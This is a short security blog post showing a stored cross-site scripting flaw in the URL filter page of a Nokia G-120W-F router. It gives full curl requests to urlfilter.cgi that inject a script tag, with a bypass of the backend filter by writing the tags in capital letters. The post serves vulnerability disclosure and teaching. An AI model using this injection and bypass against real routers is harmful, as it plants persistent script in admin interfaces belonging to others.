Posts Stored XSS - Router Nokia G-120W-F
Post
Cancel

Stored XSS - Router Nokia G-120W-F

How to exploitation XSS Stored on Router Nokia G-120W-F

Device

Device Name G-120W-F
Vendor Nokia
Serial Number ALCLFA5F444E
Hardware Version 3FE46921AAAA
Boot Version U-Boot Dec-31-2016–12:00:00
Software Version 3FE46606AGAB91
Chipset MTK7526FD

Exploitation

Through the web interface, it is not possible to make an injection of javascript code in any of the fields of the form.

Alert

But analyzing the request, we can copy the same request and change the data that was sent to the router.

Alert

When we insert valid data, the interface makes a POST request for a cgi script called urlfilter.cgi. Firefox has an option that allows you to copy the data that was sent and set up a command with cURL, passing User-Agent, Content-Type, Cookie and the data that was sent in the request. To obtain the command, just right-click on the request and go to the option “copy as cURL“.

In my case it looked like this:

1
curl 'http://192.168.237.254/urlfilter.cgi?add' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://192.168.237.254' -H 'Connection: keep-alive' -H 'Referer: http://192.168.237.254/urlfilter.cgi' -H 'Cookie: lsid=YRTNSynGMeHSwqOx; lang=../../..; sid=KpJqGrBuvsTrduXP; admin=1' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'csrf_token=LnwHSQKbNXXlDciL&passwd_token_value=&url_address=http%3A%2F%2F0xdutra.com&port_num=8080'

If we change the value of the url_address field to a javascript script, we can validate that this page is vulnerable to XSS.

Command changed:

1
curl 'http://192.168.237.254/urlfilter.cgi?add' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://192.168.237.254' -H 'Connection: keep-alive' -H 'Referer: http://192.168.237.254/urlfilter.cgi' -H 'Cookie: lsid=YRTNSynGMeHSwqOx; lang=../../..; sid=KpJqGrBuvsTrduXP; admin=1' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'csrf_token=LnwHSQKbNXXlDciL&passwd_token_value=&url_address=<script>alert(1)</script>&port_num=8080'

On the first attempt, the router’s backend blocked the code injection via cURL, but it was possible to bypass the protection leaving the tags in capital letters.

1
curl 'http://192.168.237.254/urlfilter.cgi?add' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://192.168.237.254' -H 'Connection: keep-alive' -H 'Referer: http://192.168.237.254/urlfilter.cgi' -H 'Cookie: lsid=YRTNSynGMeHSwqOx; lang=../../..; sid=KpJqGrBuvsTrduXP; admin=1' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'csrf_token=LnwHSQKbNXXlDciL&passwd_token_value=&url_address=<SCRIPT>alert(1)</SCRIPT>&port_num=8080'

Now, when we access the URL Filter page, a dialog box always appears, printing the number 1 on the screen.

Alert

References

https://owasp.org/www-project-top-ten/

https://owasp.org/www-project-top-ten/2017/A72017-Cross-Site_Scripting(XSS)

This post is licensed under CC BY 4.0 by the author.
Recent Update
Trending Tags

Trending Tags